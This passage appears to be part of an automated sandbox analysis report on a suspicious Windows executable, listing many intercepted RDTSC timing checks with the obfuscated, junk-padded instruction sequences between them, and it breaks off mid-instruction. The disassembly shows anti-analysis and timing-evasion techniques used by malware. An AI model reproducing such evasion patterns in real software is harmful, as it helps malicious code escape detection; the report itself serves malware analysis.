        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C00F3 second address: 49C0105 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0105 second address: 49C0109 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0109 second address: 49C010F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C010F second address: 49C0180 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C1C542h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b mov edx, esi 0x0000000d mov ax, 3AD9h 0x00000011 popad 0x00000012 push 0D42E80Fh 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F48A0C1C53Bh 0x0000001e sub cx, 294Eh 0x00000023 jmp 00007F48A0C1C549h 0x00000028 popfd 0x00000029 mov si, 2957h 0x0000002d popad 0x0000002e xor dword ptr [esp], 78E7C37Fh 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 jmp 00007F48A0C1C53Fh 0x0000003d pushad 0x0000003e popad 0x0000003f popad 0x00000040 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0180 second address: 49C0186 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0186 second address: 49C01A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C1C541h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr fs:[00000000h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C01A9 second address: 49C01AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C01AD second address: 49C01C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C1C53Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C01C0 second address: 49C01FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 jmp 00007F48A0C206DBh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F48A0C206E4h 0x00000015 add si, 34E8h 0x0000001a jmp 00007F48A0C206DBh 0x0000001f popfd 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C01FF second address: 49C0203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0203 second address: 49C0299 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C206E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F48A0C206E1h 0x00000011 pushfd 0x00000012 jmp 00007F48A0C206E0h 0x00000017 sub ax, 09A8h 0x0000001c jmp 00007F48A0C206DBh 0x00000021 popfd 0x00000022 popad 0x00000023 nop 0x00000024 pushad 0x00000025 jmp 00007F48A0C206E4h 0x0000002a mov ebx, eax 0x0000002c popad 0x0000002d sub esp, 18h 0x00000030 pushad 0x00000031 jmp 00007F48A0C206DAh 0x00000036 movzx ecx, di 0x00000039 popad 0x0000003a push ebp 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F48A0C206E9h 0x00000042 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0299 second address: 49C02C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C1C541h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F48A0C1C53Dh 0x00000013 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C02C0 second address: 49C02EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C206E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F48A0C206DEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C02EB second address: 49C02F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C02F1 second address: 49C038C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C206DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b push ecx 0x0000000c push edi 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pushfd 0x00000010 jmp 00007F48A0C206DCh 0x00000015 and ch, FFFFFFE8h 0x00000018 jmp 00007F48A0C206DBh 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, edi 0x00000020 jmp 00007F48A0C206E6h 0x00000025 push eax 0x00000026 pushad 0x00000027 mov cl, bl 0x00000029 pushfd 0x0000002a jmp 00007F48A0C206DAh 0x0000002f sbb ax, 2578h 0x00000034 jmp 00007F48A0C206DBh 0x00000039 popfd 0x0000003a popad 0x0000003b xchg eax, edi 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007F48A0C206E4h 0x00000043 sbb cx, BFD8h 0x00000048 jmp 00007F48A0C206DBh 0x0000004d popfd 0x0000004e push eax 0x0000004f push edx 0x00000050 movzx ecx, bx 0x00000053 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C038C second address: 49C03F2 instructions: 0x00000000 rdtsc 0x00000002 movsx ebx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov eax, dword ptr [75AB4538h] 0x0000000d jmp 00007F48A0C1C53Ah 0x00000012 xor dword ptr [ebp-08h], eax 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F48A0C1C53Eh 0x0000001c sbb cx, 7168h 0x00000021 jmp 00007F48A0C1C53Bh 0x00000026 popfd 0x00000027 push eax 0x00000028 push edx 0x00000029 pushfd 0x0000002a jmp 00007F48A0C1C546h 0x0000002f add esi, 3FA7C3C8h 0x00000035 jmp 00007F48A0C1C53Bh 0x0000003a popfd 0x0000003b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C03F2 second address: 49C045F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F48A0C206E8h 0x00000008 sbb eax, 58F0C628h 0x0000000e jmp 00007F48A0C206DBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xor eax, ebp 0x00000019 jmp 00007F48A0C206DFh 0x0000001e nop 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F48A0C206E4h 0x00000026 sbb ax, 13B8h 0x0000002b jmp 00007F48A0C206DBh 0x00000030 popfd 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C045F second address: 49C046E instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C046E second address: 49C0472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0472 second address: 49C0478 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0478 second address: 49C04BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C206E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b movzx ecx, dx 0x0000000e movsx edi, si 0x00000011 popad 0x00000012 lea eax, dword ptr [ebp-10h] 0x00000015 jmp 00007F48A0C206E2h 0x0000001a mov dword ptr fs:[00000000h], eax 0x00000020 pushad 0x00000021 mov si, B1FDh 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C04BA second address: 49C0526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F48A0C1C546h 0x0000000a adc al, 00000008h 0x0000000d jmp 00007F48A0C1C53Bh 0x00000012 popfd 0x00000013 popad 0x00000014 popad 0x00000015 mov dword ptr [ebp-18h], esp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F48A0C1C53Bh 0x00000021 adc al, 0000004Eh 0x00000024 jmp 00007F48A0C1C549h 0x00000029 popfd 0x0000002a jmp 00007F48A0C1C540h 0x0000002f popad 0x00000030 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0526 second address: 49C055C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C206DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000018h] 0x0000000f pushad 0x00000010 mov edx, esi 0x00000012 popad 0x00000013 mov ecx, dword ptr [eax+00000FDCh] 0x00000019 pushad 0x0000001a mov ah, bl 0x0000001c mov edi, esi 0x0000001e popad 0x0000001f test ecx, ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F48A0C206DDh 0x00000028 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C055C second address: 49C0562 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0562 second address: 49C0598 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007F48A0C20713h 0x0000000e jmp 00007F48A0C206DFh 0x00000013 add eax, ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F48A0C206E5h 0x0000001c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0099 second address: 49B00D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C1C544h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F48A0C1C540h 0x0000000f push eax 0x00000010 jmp 00007F48A0C1C53Bh 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B00D5 second address: 49B00D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B00D9 second address: 49B00F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C1C547h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B00F4 second address: 49B014B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C206E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b mov bh, 08h 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F48A0C206E7h 0x00000018 popad 0x00000019 mov dx, ax 0x0000001c popad 0x0000001d xchg eax, edi 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F48A0C206E1h 0x00000025 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0181 second address: 49B0185 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0185 second address: 49B018B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B018B second address: 49B019C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F48A0C1C53Dh 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B019C second address: 49B01C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F48A0C206E4h 0x00000016 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B01C1 second address: 49B01C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B01C7 second address: 49B01D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F48A0C206DDh 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B01D8 second address: 49B01EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, 00000000h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 mov dx, si 0x00000013 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B01EB second address: 49B023D instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 call 00007F48A0C206E7h 0x0000000c jmp 00007F48A0C206E8h 0x00000011 pop esi 0x00000012 popad 0x00000013 inc ebx 0x00000014 jmp 00007F48A0C206E1h 0x00000019 test al, al 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B023D second address: 49B0241 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0241 second address: 49B0247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0247 second address: 49B024D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B024D second address: 49B0251 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0341 second address: 49B0351 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F48A0C1C53Ch 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0351 second address: 49B0355 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0355 second address: 49B0390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F4911CCA665h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov bx, cx 0x00000014 pushfd 0x00000015 jmp 00007F48A0C1C544h 0x0000001a add ax, 5478h 0x0000001f jmp 00007F48A0C1C53Bh 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0390 second address: 49B03AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 029Ah 0x00000007 mov ebx, 0E2BAE66h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f js 00007F48A0C20799h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov al, 4Fh 0x0000001a mov cx, bx 0x0000001d popad 0x0000001e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B03AE second address: 49B040E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C1C53Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-14h], edi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F48A0C1C53Eh 0x00000013 sbb eax, 5B2F3938h 0x00000019 jmp 00007F48A0C1C53Bh 0x0000001e popfd 0x0000001f push eax 0x00000020 push edx 0x00000021 pushfd 0x00000022 jmp 00007F48A0C1C546h 0x00000027 adc esi, 377FB398h 0x0000002d jmp 00007F48A0C1C53Bh 0x00000032 popfd 0x00000033 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B040E second address: 49B0442 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C206E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jne 00007F4911CCE746h 0x00000010 pushad 0x00000011 call 00007F48A0C206DEh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0442 second address: 49B04FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pushfd 0x00000007 jmp 00007F48A0C1C53Ch 0x0000000c sbb cx, B858h 0x00000011 jmp 00007F48A0C1C53Bh 0x00000016 popfd 0x00000017 pop eax 0x00000018 popad 0x00000019 mov ebx, dword ptr [ebp+08h] 0x0000001c jmp 00007F48A0C1C53Fh 0x00000021 lea eax, dword ptr [ebp-2Ch] 0x00000024 jmp 00007F48A0C1C546h 0x00000029 xchg eax, esi 0x0000002a jmp 00007F48A0C1C540h 0x0000002f push eax 0x00000030 pushad 0x00000031 mov ecx, ebx 0x00000033 pushad 0x00000034 mov di, 392Eh 0x00000038 pushfd 0x00000039 jmp 00007F48A0C1C53Fh 0x0000003e add si, 49DEh 0x00000043 jmp 00007F48A0C1C549h 0x00000048 popfd 0x00000049 popad 0x0000004a popad 0x0000004b xchg eax, esi 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F48A0C1C548h 0x00000055 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B04FB second address: 49B050A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C206DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B050A second address: 49B0510 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0510 second address: 49B052E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F48A0C206E3h 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B052E second address: 49B058A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C1C549h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007F48A0C1C53Eh 0x00000011 xchg eax, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F48A0C1C53Dh 0x0000001b or si, FEE6h 0x00000020 jmp 00007F48A0C1C541h 0x00000025 popfd 0x00000026 mov cx, 0D17h 0x0000002a popad 0x0000002b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B058A second address: 49B05A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F48A0C206E8h 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0E57 second address: 49A0E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0E5B second address: 49A0E77 instructions: 0x00000000 rdtsc 0x00000002 mov dx, ED60h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, ebx 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F48A0C206DEh 0x00000013 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0E77 second address: 49A0EA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 73EFEE54h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 mov bh, 51h 0x00000012 popad 0x00000013 xchg eax, ecx 0x00000014 pushad 0x00000015 mov edi, esi 0x00000017 mov esi, 51467BABh 0x0000001c popad 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F48A0C1C53Ch 0x00000025 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0EA3 second address: 49A0EB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F48A0C206DEh 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0F63 second address: 49A0F9E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F48A0C1C542h 0x00000008 and si, 3118h 0x0000000d jmp 00007F48A0C1C53Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 leave 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a jmp 00007F48A0C1C53Bh 0x0000001f mov bh, al 0x00000021 popad 0x00000022 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0F9E second address: 49A0FA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0FA4 second address: 49A0FA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0A61 second address: 49B0A67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0A67 second address: 49B0A6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0A6D second address: 49B0A71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0A71 second address: 49B0A94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C1C53Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F48A0C1C53Ah 0x00000015 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0A94 second address: 49B0AA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C206DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0AA3 second address: 49B0B32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C1C549h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F48A0C1C541h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F48A0C1C53Ch 0x00000017 or ch, 00000078h 0x0000001a jmp 00007F48A0C1C53Bh 0x0000001f popfd 0x00000020 mov bx, ax 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 jmp 00007F48A0C1C542h 0x0000002b cmp dword ptr [75AB459Ch], 05h 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 mov edi, 3C3EF2F0h 0x0000003a call 00007F48A0C1C549h 0x0000003f pop ecx 0x00000040 popad 0x00000041 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0C0A second address: 49B0C1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F48A0C206E1h 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0C1F second address: 49B0CA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C1C541h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007F48A0C1C541h 0x00000014 mov eax, dword ptr [eax] 0x00000016 jmp 00007F48A0C1C541h 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f jmp 00007F48A0C1C541h 0x00000024 pop eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 mov bh, D3h 0x0000002a pushfd 0x0000002b jmp 00007F48A0C1C544h 0x00000030 add ecx, 7B53B898h 0x00000036 jmp 00007F48A0C1C53Bh 0x0000003b popfd 0x0000003c popad 0x0000003d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0CA1 second address: 49B0CDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F48A0C206DFh 0x00000008 push ecx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d call 00007F4911CC5590h 0x00000012 push 75A52B70h 0x00000017 push dword ptr fs:[00000000h] 0x0000001e mov eax, dword ptr [esp+10h] 0x00000022 mov dword ptr [esp+10h], ebp 0x00000026 lea ebp, dword ptr [esp+10h] 0x0000002a sub esp, eax 0x0000002c push ebx 0x0000002d push esi 0x0000002e push edi 0x0000002f mov eax, dword ptr [75AB4538h] 0x00000034 xor dword ptr [ebp-04h], eax 0x00000037 xor eax, ebp 0x00000039 push eax 0x0000003a mov dword ptr [ebp-18h], esp 0x0000003d push dword ptr [ebp-08h] 0x00000040 mov eax, dword ptr [ebp-04h] 0x00000043 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000004a mov dword ptr [ebp-08h], eax 0x0000004d lea eax, dword ptr 